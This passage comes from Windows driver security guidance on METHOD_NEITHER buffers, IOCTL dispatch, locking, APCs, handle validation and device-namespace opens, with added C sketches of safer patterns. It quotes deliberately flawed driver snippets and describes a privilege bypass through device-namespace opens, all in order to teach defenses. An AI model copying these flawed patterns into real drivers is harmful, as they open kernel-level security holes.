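One possible way to avoid depending on a terminator written into a doubly mapped buffer is to copy the data once into private storage and bound every later scan by the copied length. The user-space sketch below illustrates that idea. CaptureString is a hypothetical helper and is not the fix prescribed by the paper; in a driver the private copy would live in memory that the caller cannot reach.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/*
 * Copies at most DestChars - 1 16-bit characters from Shared into Dest,
 * terminates Dest, and returns the number of characters that precede the
 * first null in the private copy. Shared is read exactly once.
 */
size_t CaptureString(const uint16_t *Shared, size_t SharedBytes,
                     uint16_t *Dest, size_t DestChars)
{
    size_t chars = SharedBytes / sizeof(uint16_t);  /* drop an odd trailing byte */
    size_t i;

    if (DestChars == 0) {
        return 0;
    }
    if (chars > DestChars - 1) {
        chars = DestChars - 1;
    }
    memcpy(Dest, Shared, chars * sizeof(uint16_t));  /* single copy */
    Dest[chars] = 0;                                 /* terminator in private memory */

    for (i = 0; i < chars && Dest[i] != 0; i++) {
        /* bounded scan of the private copy */
    }
    return i;
}
```

Later changes to the shared buffer cannot affect the captured string, and the scan never runs past the copied length even if the caller omitted the terminator.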

If a driver creates and maps its own MDL, it must access the MDL only with the method for which it has probed. When the driver calls MmProbeAndLockPages, it specifies an access method (IoReadAccess, IoWriteAccess, or IoModifyAccess). If the driver specifies IoReadAccess, it must not attempt to write to the system buffer made available by MmGetSystemAddressForMdlSafe.

Further problems can occur in direct I/O paths when resources are unavailable. If insufficient system page table entries (PTEs) are available, MmGetSystemAddressForMdlSafe fails and returns NULL.

Note   Microsoft Windows 98 does not support MmGetSystemAddressForMdlSafe. In a WDM driver that must run on Windows 98, call MmGetSystemAddressForMdl, setting the MDL_MAPPING_CAN_FAIL MDL flag in the MdlFlags member of the MDL structure. MmGetSystemAddressForMdl is obsolete on Windows Me, Windows 2000, and all later releases.

Neither Buffered nor Direct I/O (METHOD_NEITHER)

When handling a METHOD_NEITHER I/O request, the I/O Manager does not validate the supplied buffer pointers and lengths. Drivers must validate the pointers, lengths, and alignment by probing. Drivers must also use try/except blocks around each access to the user buffer to handle any exceptions that might occur.
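
The kind of range check that probing involves can be modeled in a few lines of portable C. The sketch below is only an illustration of the arithmetic (alignment, wrap-around, and upper bound); it is not the implementation of ProbeForRead or ProbeForWrite, and DEMO_USER_LIMIT and demo_probe_range are hypothetical names chosen for this example.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical stand-in for the first address that user mode may not own. */
#define DEMO_USER_LIMIT ((uintptr_t)0x7FFF0000u)

/*
 * Returns true if [address, address + length) is aligned as requested,
 * does not wrap around, and lies entirely below DEMO_USER_LIMIT.
 * alignment must be a power of two. A zero-length range is accepted
 * without further checks.
 */
bool demo_probe_range(uintptr_t address, size_t length, uintptr_t alignment)
{
    if (length == 0)
        return true;
    if ((address & (alignment - 1)) != 0)
        return false;       /* misaligned */
    if (address + length < address)
        return false;       /* address + length wrapped around */
    if (address + length > DEMO_USER_LIMIT)
        return false;       /* range reaches past the user-mode limit */
    return true;
}
```

A range that passes such a check can still become invalid later, for example if the caller frees the memory, which is why each access to the user buffer still needs a try/except block.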

The driver must also manage the buffers and memory operations by itself. When possible, the driver should perform all operations on the buffer directly within the context of the calling thread. When running outside this context, the driver must use MmProbeAndLockPages to double-map and lock down the buffer, thus preventing asynchronous changes to the data.

Some file-system drivers and network transport drivers define IOCTLs for fast I/O. Fast I/O, which uses METHOD_NEITHER, involves transferring data directly between user buffers and the system cache. Because the data in the user buffers can change asynchronously, fast I/O dispatch routines can be difficult to code. All references to user buffers must be enclosed in try/except blocks, and all METHOD_NEITHER buffers must be probed.

If a driver allocates resources in a fast I/O path, the driver must subsequently release those resources if an exception occurs while referencing user-mode memory. Failing to release resources in such situations is a common driver error.

For most fast I/O paths, the I/O Manager calls the fast I/O dispatch routine from within a try/except block. A driver that allocates resources in a fast I/O path must include an exception handler in its fast I/O dispatch routine. A driver that performs fast I/O and accesses user-mode memory, but does not allocate resources in the fast I/O path, should include an exception handler in its fast I/O dispatch routine. It is not required to do so, however.

Device State Validation

In addition to validating pointers, drivers should validate device state in both the checked and free builds.

In the following example, the driver uses the ASSERT macro to check for the correct device state in the checked build, but does not check the device state in the free build.

case IOCTL_WAIT_FOR_EVENT:

     ASSERT((!Extension->WaitEventIrp));
     Extension->WaitEventIrp = Irp;
     IoMarkIrpPending(Irp);
     status = STATUS_PENDING;

In the checked build, if the driver already holds an IRP pending, the ASSERT fires. In the free build, however, the driver does not check for this condition, so a second call to the same IOCTL overwrites the saved pointer and the driver loses track of the first IRP.

On a multiprocessor system, this code fragment might cause additional problems. Assume that on entry, the routine that includes this code has ownership of (the right to manipulate) the IRP. When the routine saves the Irp pointer in the global structure at Extension->WaitEventIrp, another thread can read the IRP address from that global structure and perform operations on the IRP. To prevent this problem, the driver should mark the IRP pending before it saves the IRP, and should include both the call to IoMarkIrpPending and the assignment in an interlocked sequence. A Cancel routine for the IRP might also be necessary.
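
A user-mode model of this advice is sketched below. It checks the state in every build, and it marks the request pending and saves it while holding a lock. All names are hypothetical: demo_request stands in for an IRP, the atomic_flag stands in for a spin lock, and the status values are placeholders rather than NTSTATUS codes. Cancel handling is omitted.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stddef.h>

enum { DEMO_STATUS_PENDING = 1, DEMO_STATUS_DEVICE_BUSY = 2 };

typedef struct { bool pending; } demo_request;      /* stands in for an IRP */

typedef struct {
    atomic_flag   lock;             /* stands in for a spin lock */
    demo_request *wait_request;     /* stands in for Extension->WaitEventIrp */
} demo_extension;

static void demo_lock(demo_extension *ext)
{
    while (atomic_flag_test_and_set_explicit(&ext->lock, memory_order_acquire))
        ;   /* spin until the flag was previously clear */
}

static void demo_unlock(demo_extension *ext)
{
    atomic_flag_clear_explicit(&ext->lock, memory_order_release);
}

int demo_wait_for_event(demo_extension *ext, demo_request *req)
{
    int status;

    demo_lock(ext);
    if (ext->wait_request != NULL) {
        /* Checked at run time in every build, not only by an assertion. */
        status = DEMO_STATUS_DEVICE_BUSY;
    } else {
        req->pending = true;        /* mark pending before publishing the pointer */
        ext->wait_request = req;
        status = DEMO_STATUS_PENDING;
    }
    demo_unlock(ext);
    return status;
}
```

With this shape, a second request on the same device is rejected instead of silently replacing the first one.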

Cleanup and Close Routines

Driver writers must not confuse the tasks required in DispatchCleanup and DispatchClose routines.

The I/O Manager calls a driver’s DispatchCleanup routine when the last handle to a file object is closed. A cleanup request indicates that an application is being terminated, or has closed a file handle for the file object that represents the driver’s device object. The I/O Manager still holds a reference to the file object, however. The I/O Manager calls the DispatchClose routine when the last reference is released from the file object.

The DispatchCleanup routine should cancel any IRPs that are currently queued to the target device for the file object, but must not free resources that are attached to the file object or that might be used by other Dispatch routines. Because the I/O Manager holds a reference to the file object, a driver can receive I/O requests for a file object after its DispatchCleanup routine has been called, but before its DispatchClose routine is called.

For example, a user-mode caller might close the file handle while an I/O Manager request is in progress from another thread. If the driver deletes or frees necessary resources before the I/O Manager calls its DispatchClose routine, invalid pointer references and other problems could occur.

Device Control Routines

The following errors are common in DispatchDeviceControl routines, which handle IOCTLs:

  • Breaking apart IOCTL and FSCTL values.
  • Converging code paths for public and private IOCTLs.
  • Checking only the requestor mode to validate IOCTL or FSCTL IRPs.

Breaking Apart IOCTL and FSCTL Values

A driver must use the full value of the IOCTL control code, and not a subset of the bits, in its dispatch routine. Access checks and the IOCTL method are encoded into the control code. Ignoring the values of these bit fields could make the driver vulnerable to other unvalidated IOCTL routes. For example,

IoControlCode =
      pIrpStack->Parameters.DeviceIoControl.IoControlCode;
ControlCode   = (IoControlCode >> 2) & 0x00000FFF;

pCmd = pIrp -> AssociatedIrp.SystemBuffer;

switch (ControlCode) {
      case IOCTL_SET_TIMEOUT:
           pTimeOut = pIrp -> AssociatedIrp.SystemBuffer;
           *pTimeOut = InterlockedExchange(
                           &pde->TimeOutValue,
                           *pTimeOut);

This code discards both the method bits and the access bits before the switch statement. In this example, if the intended IOCTL required write access to the device to issue this request, a caller could execute the switch statement with a different IOCTL value that did not require write access, but matched the extracted bits. Even if this code checks the input buffer length, it cannot tell which fields of the IRP contain the input buffer unless it consults the method bits of the IOCTL.

The I/O Manager macro IoGetFunctionCodeFromCtlCode has the same problem as the preceding example. Drivers should not use this macro.

An alternative method that avoids these problems is to build an array of structures indexed by the IOCTL function code. One field of the structure might contain the dispatch routine and another field might contain the complete IOCTL or FSCTL control code to compare against the input. Using such a structure, a driver can check both the calling method and the access control bits in one compare operation.
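
A minimal sketch of such a table follows, written as ordinary C so that it can be compiled outside the kernel. DEMO_CTL_CODE uses the same bit layout as the DDK CTL_CODE macro (device type, access, function, method); every other name, the device type 0x8000, and the function numbers 0 and 1 are assumptions made for the example. A real driver whose function codes start at a higher base would subtract that base before indexing.

```c
#include <stddef.h>
#include <stdint.h>

/* Same bit layout as CTL_CODE: type << 16 | access << 14 | function << 2 | method. */
#define DEMO_CTL_CODE(type, function, method, access) \
    (((uint32_t)(type) << 16) | ((uint32_t)(access) << 14) | \
     ((uint32_t)(function) << 2) | (uint32_t)(method))

#define DEMO_METHOD_BUFFERED 0u
#define DEMO_METHOD_NEITHER  3u
#define DEMO_ANY_ACCESS      0u
#define DEMO_WRITE_ACCESS    2u
#define DEMO_DEVICE_TYPE     0x8000u    /* hypothetical device type */

#define DEMO_IOCTL_GET_TIMEOUT \
    DEMO_CTL_CODE(DEMO_DEVICE_TYPE, 0, DEMO_METHOD_BUFFERED, DEMO_ANY_ACCESS)
#define DEMO_IOCTL_SET_TIMEOUT \
    DEMO_CTL_CODE(DEMO_DEVICE_TYPE, 1, DEMO_METHOD_BUFFERED, DEMO_WRITE_ACCESS)

typedef int (*demo_handler)(void);

static int demo_get_timeout(void) { return 100; }   /* placeholder handlers */
static int demo_set_timeout(void) { return 200; }

typedef struct {
    uint32_t     full_code;     /* complete control code, all bit fields */
    demo_handler handler;
} demo_ioctl_entry;

/* Indexed by function code. */
static const demo_ioctl_entry demo_table[] = {
    { DEMO_IOCTL_GET_TIMEOUT, demo_get_timeout },
    { DEMO_IOCTL_SET_TIMEOUT, demo_set_timeout },
};

/* Returns the handler for code, or NULL if any bit differs from the table entry. */
demo_handler demo_lookup(uint32_t code)
{
    uint32_t function = (code >> 2) & 0xFFFu;

    if (function >= sizeof(demo_table) / sizeof(demo_table[0]))
        return NULL;
    if (demo_table[function].full_code != code)
        return NULL;    /* wrong device type, access, or method bits */
    return demo_table[function].handler;
}
```

The function code is used only to find a candidate entry; the decision to dispatch rests on comparing the complete code, so a value with the same function number but different access or method bits is rejected.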

Converging Code Paths for Public IOCTLs and Private IOCTLs

As a general rule, drivers should not contain converging execution paths for private (internal) and public IOCTLs or FSCTLs. A driver that creates private IOCTLs or FSCTLs should handle such requests separately from any public IOCTLs or FSCTLs that it also supports.

A driver cannot determine whether an IOCTL or FSCTL originated in kernel mode or user mode merely from checking the control code. Consequently, handling both along the same code path (or performing minimal validation and then calling the same routines) can open a driver to security breaches. If a private IOCTL or FSCTL is privileged, unprivileged users who know the control codes might be able to gain access to it.

Checking Only the Requestor Mode to Validate IOCTL or FSCTL IRPs

Drivers should not validate IOCTL and FSCTL requests in IRPs by checking the value of Irp->RequestorMode only. IRPs that arrive from the network and the Server service (SRVSVC) have a requestor mode of kernel, regardless of the origin of the request. A driver that relies on the previous processor mode for the thread could unintentionally use an invalid user-mode pointer without probing, or perform an operation for which the original requestor does not have the required permissions.

Instead, drivers should use the appropriate access control checks, such as FILE_READ_DATA, FILE_WRITE_DATA, and so forth.

Synchronization

On the Microsoft Windows NT, Microsoft Windows 2000, and Windows XP operating systems, drivers are multithreaded; they can receive multiple I/O requests from different threads at the same time. In designing a driver, you must assume that it will be run on a symmetric multiprocessor (SMP) system and take the appropriate measures to ensure data integrity.

Specifically, whenever a driver changes global or file object data, it must use a lock or an interlocked sequence to prevent race conditions.

In the following example, a race condition could occur when the driver accesses the global data at Data.LpcInfo.

PLPC_INFO pLpcInfo = &Data.LpcInfo; //Pointer to global data
   ...
   ...
// This saved pointer may be overwritten by another thread.
pLpcInfo->LpcPortName.Buffer = ExAllocatePool(
                                     PagedPool,
                                     arg->PortName.Length);
 

Multiple threads entering this code as a result of an IOCTL call could cause a memory leak when the pointer is overwritten. To avoid this problem, the driver should use the ExInterlockedXxx routines or some type of lock when it changes the global data. The driver’s requirements determine the acceptable types of locks.
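
The interlocked approach can be sketched in user mode with C11 atomics: allocate first, then install the pointer with a compare-and-exchange, and free the new allocation if another thread got there first. In a driver, a routine such as InterlockedCompareExchangePointer would play the role of atomic_compare_exchange_strong; demo_port_name_buffer and demo_install_buffer are hypothetical names, and malloc and free stand in for the pool routines.

```c
#include <stdatomic.h>
#include <stdbool.h>
#include <stdlib.h>

/* Stands in for the global buffer pointer shared by all requests. */
static _Atomic(void *) demo_port_name_buffer;

/*
 * Allocates a buffer and installs it only if no buffer is installed yet.
 * Returns true if this call installed its buffer, false otherwise.
 */
bool demo_install_buffer(size_t length)
{
    void *expected = NULL;
    void *fresh = malloc(length);

    if (fresh == NULL)
        return false;
    if (!atomic_compare_exchange_strong(&demo_port_name_buffer, &expected, fresh)) {
        /* Another caller already installed a buffer: keep theirs, release ours. */
        free(fresh);
        return false;
    }
    return true;
}
```

Whichever thread loses the exchange frees its own allocation, so no pointer is overwritten and nothing leaks.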

The following example attempts to reallocate a file-specific buffer (Endpoint->LocalAddress) to hold the endpoint address.

Endpoint = FileObject->FsContext;

if (Endpoint->LocalAddress != NULL &&
    Endpoint->LocalAddressLength <
       ListenEndpoint->LocalAddressLength ) {

      FREE_POOL (Endpoint->LocalAddress,
                 LOCAL_ADDRESS_POOL_TAG );
      Endpoint->LocalAddress  = NULL;
   }

if ( Endpoint->LocalAddress == NULL ) {
      Endpoint->LocalAddress =
            ALLOCATE_POOL (NonPagedPool,
                     ListenEndpoint->LocalAddressLength,
                     LOCAL_ADDRESS_POOL_TAG);
   }

In this example, a race condition could occur when the file object is accessed. Because the driver does not hold any locks, two requests for the same file object could enter this function. The result might be references to freed memory, multiple attempts to free the same memory, or memory leaks. To avoid these errors, the two if statements should be performed while the driver holds a spin lock.

Shared Access

File system drivers (FSD) and other highest-level drivers must perform access checks against an object’s security descriptor before using IoXxxShareAccess routines to check, set, remove, or update shared access to the object.

To handle shared access, drivers should:

  1. Obtain the requested access from the incoming IRP.
  2. If the IRP major function code is IRP_MJ_CREATE, determine the effective mode of the request. If the value of the Irp->RequestorMode field is KernelMode, check whether the SL_FORCE_ACCESS_CHECK flag is set in the IrpSp->Flags field. If this flag is set, access checks must specify that the request originated in user mode.
  3. Check the requested access against the object’s security descriptor. Pass the access requested in the IRP as the DesiredAccess parameter to SeAccessCheck.
  4. Compare the GrantedAccess returned by SeAccessCheck with the access requested in the IRP. If the GrantedAccess is more restrictive than the access requested in the IRP, complete the IRP with STATUS_ACCESS_DENIED. If the GrantedAccess matches the access requested in the IRP, proceed.
  5. Check the permitted shared access. Use the ACCESS_MASK value returned in the GrantedAccess parameter of SeAccessCheck as the DesiredAccess input parameter to IoCheckShareAccess.

SeAccessCheck sets only those bits in the returned GrantedAccess value that indicate the access actually granted to the user; the MAXIMUM_ALLOWED bit is always cleared in the returned value. To handle shared access correctly, drivers should follow these guidelines:

  • Drivers should inspect the access requested in the IRP before comparing it with the GrantedAccess value returned by SeAccessCheck. If the IRP requests MAXIMUM_ALLOWED, the driver must check the individual bits in the GrantedAccess value to determine whether sufficient access has been granted.
  • Drivers must pass the GrantedAccess value returned by SeAccessCheck as the DesiredAccess input parameter when calling IoXxxShareAccess.

For similar reasons, drivers should not attempt optimizations or partial access control by checking desired access for other bits, such as FILE_WRITE_DATA.
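
The comparison in these guidelines reduces to a small amount of bit logic, sketched below as plain C. The three mask values match the standard definitions of FILE_READ_DATA, FILE_WRITE_DATA, and MAXIMUM_ALLOWED; the function demo_access_sufficient and its needed parameter (the rights the driver requires for the operation at hand) are hypothetical.

```c
#include <stdbool.h>
#include <stdint.h>

#define DEMO_FILE_READ_DATA   0x00000001u
#define DEMO_FILE_WRITE_DATA  0x00000002u
#define DEMO_MAXIMUM_ALLOWED  0x02000000u

/*
 * requested: access mask taken from the create request
 * granted:   mask returned by the access check
 * needed:    rights this operation requires (used only for MAXIMUM_ALLOWED)
 */
bool demo_access_sufficient(uint32_t requested, uint32_t granted, uint32_t needed)
{
    if (requested & DEMO_MAXIMUM_ALLOWED) {
        /* The granted mask never echoes MAXIMUM_ALLOWED; test individual bits. */
        return (granted & needed) == needed;
    }
    /* Otherwise every requested bit must have been granted. */
    return (granted & requested) == requested;
}
```

In both branches the decision is based on the granted mask, which is also the value to pass on to the share-access routines.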

Note   This section describes the correct approach for NTFS and other file systems that use the access control lists (ACLs) supported by the SeXxx routines. An installable file system that uses a different type of ACLs should perform the equivalent access checks with its own rights-granting mechanism.

Locks and Disabling APCs

Certain locking primitives, user-supplied locks, and the unconventional use of events or other objects as locks have the potential to deadlock the system. Kernel-mode drivers that use such locking mechanisms should disable asynchronous procedure calls (APCs), unless the driver runs in a trusted environment (a worker thread). To disable and subsequently re-enable APCs, a device driver calls the KeEnterCriticalRegion and KeLeaveCriticalRegion routines, and a file-system driver calls the FsRtlEnterFileSystem and FsRtlExitFileSystem macros. These routines disable the delivery of normal kernel APCs. Special kernel APCs, which run at IRQL APC_LEVEL, are not affected by these routines.

Disabling APCs prevents the thread that currently holds the lock from being suspended by user-mode calls to SuspendThread (which delivers a kernel APC). Typically, such calls occur during debugging, but direct calls to this API are possible from user mode. If APCs are not disabled, the thread that holds the lock never has a chance to release the lock. As a result, other threads in the system are blocked while waiting for it.

Drivers must disable APCs when calling the following system routines:

  • Any of the ExXxxResourceXxx routines. These routines do not disable APCs. Drivers must enclose code that acquires and uses such resources within KeEnterCriticalRegion and KeLeaveCriticalRegion, or FsRtlEnterFileSystem and FsRtlExitFileSystem.
  • ExAcquireFastMutexUnsafe.
  • KeWaitForSingleObject for a non-mutex object.

Drivers are not required to disable APCs when calling the following system routines:

  • KeWaitForMutexObject or KeWaitForSingleObject for a mutex object. In this situation, KeWaitForSingleObject and KeWaitForMutexObject automatically disable APCs by the equivalent of KeEnterCriticalRegion.
  • ExAcquireFastMutex. This routine returns to the caller at IRQL APC_LEVEL and therefore blocks all APCs.

The situation is more complicated when driver code in a thread must run in order to release another thread. For example, consider a driver that acts as a communication mechanism between a client and a server thread. When the server thread posts a read, a read IRP enters the driver. Because no data is waiting for the driver, it pends the IRP and sets an appropriate cancel routine. If a client thread then sends a message with a write request, a write IRP enters the driver. Because the pending read IRP is already queued, however, the driver does not handle the write IRP; instead, the driver removes the read IRP from the queue and removes its cancel routine.

Now, assume that the queues that hold the pended IRPs are protected with locks. To improve performance, the driver writer has moved IRP completion outside the locks. This strategy has two advantages:

  • The lock region is smaller, thus improving driver scalability on large multiprocessor hardware.
  • Context swaps are minimized. Other threads that enter the driver are not awakened only to be blocked immediately by a lock that the current thread still owns.

Moving completion outside the locks has the following problems, however:

  • After the IRP has been removed from the queue, no cancellation routine is in place and APCs might be enabled.
  • If the client thread is suspended after it releases the lock but before it completes the IRP from the server thread, the server thread will be blocked by the suspended client thread.

To avoid these problems, such drivers should leave APCs disabled until the IRPs have been completed. For example, the following code handles a write request in the named-pipe file system.

FsRtlEnterFileSystem();

NpAcquireSharedVcb();

Status =  NpCommonWrite( IrpSp->FileObject,
          Irp->UserBuffer,
          IrpSp->Parameters.Write.Length,
          Irp->Tail.Overlay.Thread,
          Irp,
          &DeferredList ); // List of IRPs to be
                           //completed after lock release

NpReleaseVcb();

//
// At this point we have released the locks but still
// have kernel APCs disabled.
// We need to prevent this thread from being suspended until
// after we release the server threads.
//

//
// Complete any deferred IRPs after dropping the locks.
//
NpCompleteDeferredIrps (&DeferredList);

//
// Reenable APCs after completing any server IRPs.
// Suspension before completing this thread's IRP doesn't
// matter because it would just block
// this thread anyway and it's suspended.
//
FsRtlExitFileSystem();

if (Status != STATUS_PENDING) {
    NpCompleteRequest (Irp, Status);
    }

For additional information about when waiting threads receive alerts and APCs, see the Design Guide in the Kernel-Mode Driver Architecture section of the Windows DDK.

Handle Validation

Some drivers must manipulate objects passed to them by callers, or must process two file objects at the same time. For example, a modem driver might receive a handle to an event object, or a network driver might receive handles to two different file objects. The driver must validate these handles. Because they are passed by a caller, and not through the I/O Manager, the I/O Manager cannot perform any validation checks.

In the following example, the driver has been passed the handle AscInfo->AddressHandle, but has not validated it before calling ObReferenceObjectByHandle.

// This handle is embedded in a buffered request.
//
status = ObReferenceObjectByHandle(
                  AscInfo->AddressHandle,
                  0,
                  NULL,
                  KernelMode,
                  &fileObject,
                  NULL);

if (NT_SUCCESS(status)) {
   if ( (fileObject->DeviceObject == DeviceObject) &&
        (fileObject->FsContext2 == TRANSPORT_SOCK) ) {
   ...

The call to ObReferenceObjectByHandle succeeds, but the code fails to ensure that the returned pointer references a file object; it trusts the caller to pass in the correct information. To correct this problem, the driver should pass explicit values for the DesiredAccess and ObjectType parameters.

Even if all the parameters for the call to ObReferenceObjectByHandle are correct, and the call succeeds, a driver can still get unexpected results if the file object is not intended for it. In the following example, the driver fails to ascertain that the call returns a pointer to the file object it expected.

status = ObReferenceObjectByHandle (
                          AcpInfo->Handle,
                          DesiredAccess,
                          *IoFileObjectType,
                          Irp->RequestorMode,
                          (PVOID *)&AcpEndpointFileObject,
                          NULL);

if ( !NT_SUCCESS(status) ) {
   goto complete;
}
AcpEndpoint = AcpEndpointFileObject->FsContext;

if ( AcpEndpoint->Type != BlockTypeEndpoint ) {
...

Although ObReferenceObjectByHandle returns a pointer to a file object, the driver has no guarantee that the pointer references the file object it expected. In this case, the driver should validate the pointer before accessing the driver-specific data at AcpEndpointFileObject->FsContext.

Drivers should validate handles as follows:

  • Check the object type to make sure it is what the driver expects.
  • Ensure that the requested access is appropriate for the object type and the required tasks. If the driver performs a fast file copy, for instance, it must make sure the handle has read access.
  • Specify the correct access mode (UserMode or KernelMode) and verify that the access mode is compatible with the access requested.
  • Validate the handle against the device object or driver if the driver expects a handle to a file object that the driver itself created. Do not break filters that send I/O requests for unexpected devices, however.
  • If the driver supports multiple kinds of file objects, it must be able to differentiate them. For example, TDI drivers use file objects to represent control channels, address objects, and connections. File-system drivers use file objects to represent volumes, directories, and files. Such drivers must determine which type of file object each handle represents.

Requests to Create and Open Files and Devices

Drivers can be vulnerable to problems when requests to create and open files or devices involve the following:

  • Opening files in the device namespace
  • Long file names
  • Unexpected I/O requests
  • Relative open requests for direct device open handles
  • Extended attributes

These issues are described in the following sections.

Opening Files in the Device Namespace

Drivers should set the FILE_DEVICE_SECURE_OPEN device characteristic when they call IoCreateDevice or IoCreateDeviceSecure to create a device object. The FILE_DEVICE_SECURE_OPEN characteristic directs the I/O Manager to apply the security descriptor of the device object to all open requests, including file open requests into the device’s namespace. Setting this characteristic prevents the potential security problems described in this section. For Plug-and-Play drivers, this characteristic is set in the INF file.

Drivers that support exclusive opens are the only exception to this rule. Such drivers should instead fail any IRP_MJ_CREATE requests that specify an IrpSp->FileObject->FileName parameter with a nonzero length.

The I/O Manager does not perform access checks based on the device object for open requests into the device namespace unless FILE_DEVICE_SECURE_OPEN is set. For a device named "\Device\DeviceName," the namespace consists of any name of the form "\Device\DeviceName\FileName."

Omitting access checks can open security holes in drivers that have privileged IOCTL or FSCTL interfaces. The privileged interfaces require write access to the device that is denied to unprivileged users. Unprivileged users can bypass security, however, and obtain handles with read and write access by opening a file in the device’s namespace. To prevent a user from bypassing security, a driver’s DispatchCreate routines must properly handle such create requests.

For example, an unprivileged user who attempts to open \Device\Transport will not be able to create a handle with read or write access to the device. The transport driver has protected IOCTLs, however, that allow administrators to configure the transport (for example, to change the address). These IOCTLs require write access to the device. (Read and write access requirements are encoded in the IOCTL or FSCTL value.) Unless the transport driver sets the FILE_DEVICE_SECURE_OPEN characteristic or has other code to handle the situation, a caller could open \Device\Transport\xyz, and thus gain all access to the file object created. An unprivileged caller could also use a normally opened handle to the transport to request another relative open (with or without a file name) and achieve the same result.

As an alternative to setting FILE_DEVICE_SECURE_OPEN, a driver can perform its own access checks, or it can reject such I/O requests outright. The following shows some sample rejection code.

if ( irpStack->FileObject->RelatedFileObject ||
   irpStack->FileObject->FileName.Length ) {
   Irp->IoStatus.Status = STATUS_ACCESS_DENIED;
   IoCompleteRequest(Irp, IO_NO_INCREMENT);
   return STATUS_ACCESS_DENIED;
}

Long File Names

Long file names in the create path can cause memory leaks and memory pool corruption in some drivers.

The Object Manager limits object paths to 32 K (32,768) Unicode characters. The file name length, in bytes, including a trailing Unicode NULL, must be an even number that is less than 64 KB. This limit applies to the whole object path (for example, \Device\Volume1\xxxxxx). The portion presented to the I/O Manager has the leading path to the device object removed, making it significantly shorter than 64 KB.

A driver is unlikely to encounter long file names through standard file open requests. When a caller requests a relative file name open at the native API level, however, the Object Manager and therefore the I/O Manager can present file names that are only a few bytes short of 64 KB.

When handling a relative open request, drivers often try to reconstruct the full path of the file to open. Typically, the driver concatenates the file name of the base file (the file to which the supplied name is relative) with a separator character and the file name of the relative portion. The length of the complete string can easily exceed 64 KB, and therefore will not fit in the 16-bit length fields of the UNICODE_STRING structures that represent the file names in the file objects. As a result, the driver can either corrupt pool or leak memory.

Pool corruption is caused by allocating a buffer that is too short for the target file name, as shown in the following example.

FullNameLengthTemp = RelatedCcb->FullFileName.Length +
                     AddSeparator + FileObjectName->Length;
FullFileName->MaximumLength =
       FullFileName->Length = (USHORT) FullNameLengthTemp;

FullFileName->Buffer = FsRtlAllocatePoolWithTag(
                                        PagedPool,
                                        FullFileName->Length,
                                        MODULE_POOL_TAG);

RtlCopyMemory(FullFileName->Buffer,
              RelatedCcb->FullFileName.Buffer,
              RelatedCcb->FullFileName.Length );

CurrentPosition = Add2Ptr(FullFileName->Buffer,
                          RelatedCcb->FullFileName.Length );

RtlCopyMemory( CurrentPosition,
               FileObjectName->Buffer,
               FileObjectName->Length );

The file name length calculation exceeds 64 KB and the USHORT cast truncates the length. As a result, the allocated buffer is too small and one or both of the calls to RtlCopyMemory corrupt pool.

The memory leak is a subtler problem, which occurs when the file name length is used without truncation to allocate the pool buffer. Because the buffer is large enough, this error does not corrupt pool. The file name length stored in the file object is truncated to 16 bits, however. If the truncation results in a zero length, the I/O Manager never frees the file name buffer, and a memory leak occurs. A leak can also occur if a driver changes the file name by removing excess backslash characters and these changes make the file name length field zero.
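
Both problems can be avoided by computing the combined length in a wider type and rejecting the request before any value is narrowed to 16 bits. The following portable C sketch illustrates the check; demo_full_name_length and DEMO_MAX_NAME_BYTES are hypothetical names, and the parameters correspond loosely to the three terms added together in the example above.

```c
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>

/* Largest even byte count that fits in a 16-bit length field. */
#define DEMO_MAX_NAME_BYTES 0xFFFEu

/*
 * Adds the three lengths in 32 bits and stores the total only if it
 * fits in a 16-bit length field. Returns false (and leaves *total_bytes
 * untouched) if the combined name would be too long.
 */
bool demo_full_name_length(uint16_t base_bytes, uint16_t separator_bytes,
                           uint16_t relative_bytes, uint16_t *total_bytes)
{
    uint32_t total = (uint32_t)base_bytes + separator_bytes + relative_bytes;

    if (total > DEMO_MAX_NAME_BYTES)
        return false;
    *total_bytes = (uint16_t)total;     /* safe: the range was checked above */
    return true;
}
```

For instance, two 40,000-byte names plus a 2-byte separator total 80,002 bytes; a bare cast to a 16-bit value would silently turn that into 14,466, whereas the check above reports failure so that the driver can fail the create request.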

Unexpected I/O Requests

Drivers that create more than one kind of device object must be able to handle I/O requests on every such device object.

Many drivers create more than one kind of device object by calling IoCreateDevice. Some drivers create control device objects in their DriverEntry routines to allow applications to communicate with the driver, even before the driver creates an FDO. For example, before a file system driver calls IoRegisterFileSystem to register itself as a file system, it must create a control device object to handle file system notifications.

A driver should be ready for create requests on any device object it creates. After completing the create request with a success status, the driver should expect to receive any user-accessible I/O requests on the created file object. Consequently, any driver that creates more than one device object must check which device object each I/O request specifies.

For example, a driver might expect that an I/O request specifies an FDO for a specific device, when in fact the request specifies its control device object. If the driver has not initialized the same fields in the device extension of the control device object as in the other device objects, the driver could crash when trying to use device extension information from the control device object.
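
One common way to make that check cheap is to start every device extension with the same small header that records what kind of device object it belongs to. The sketch below models the idea in ordinary C; all type names, the hardware_registers field, and the status values are hypothetical and chosen only for illustration.

```c
#include <stdbool.h>
#include <stddef.h>

typedef enum { DEMO_KIND_CONTROL, DEMO_KIND_FUNCTIONAL } demo_device_kind;

/* Every device extension begins with this header so it can be identified. */
typedef struct { demo_device_kind kind; } demo_common_extension;

typedef struct {
    demo_common_extension common;
    int                  *hardware_registers;  /* only set up for functional devices */
} demo_functional_extension;

enum { DEMO_STATUS_SUCCESS = 0, DEMO_STATUS_INVALID_DEVICE_REQUEST = -1 };

/* Model of a read dispatch routine shared by all of the driver's device objects. */
int demo_dispatch_read(void *device_extension, int *value)
{
    demo_common_extension *common = device_extension;
    demo_functional_extension *fdo;

    if (common->kind != DEMO_KIND_FUNCTIONAL)
        return DEMO_STATUS_INVALID_DEVICE_REQUEST;  /* sent to the control device */

    fdo = device_extension;     /* safe: the header says this is a functional device */
    *value = *fdo->hardware_registers;
    return DEMO_STATUS_SUCCESS;
}
```

The routine never touches fields that exist only in the functional extension until it has confirmed which kind of device object received the request.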

Relative Open Requests for Direct Device Open Handles

The I/O Manager performs a direct device open in response to create or open requests that meet all of the following criteria:

  • The volume name has no trailing characters. For example, G: is valid, but G:\ and G:\a\b are not.
  • The create request is not relative to another file handle.
  • The requested access includes one or more of the following, and no other access types: SYNCHRONIZE, FILE_READ_ATTRIBUTES, READ_CONTROL, ACCESS_SYSTEM_SECURITY, WRITE_OWNER, or WRITE_DAC.

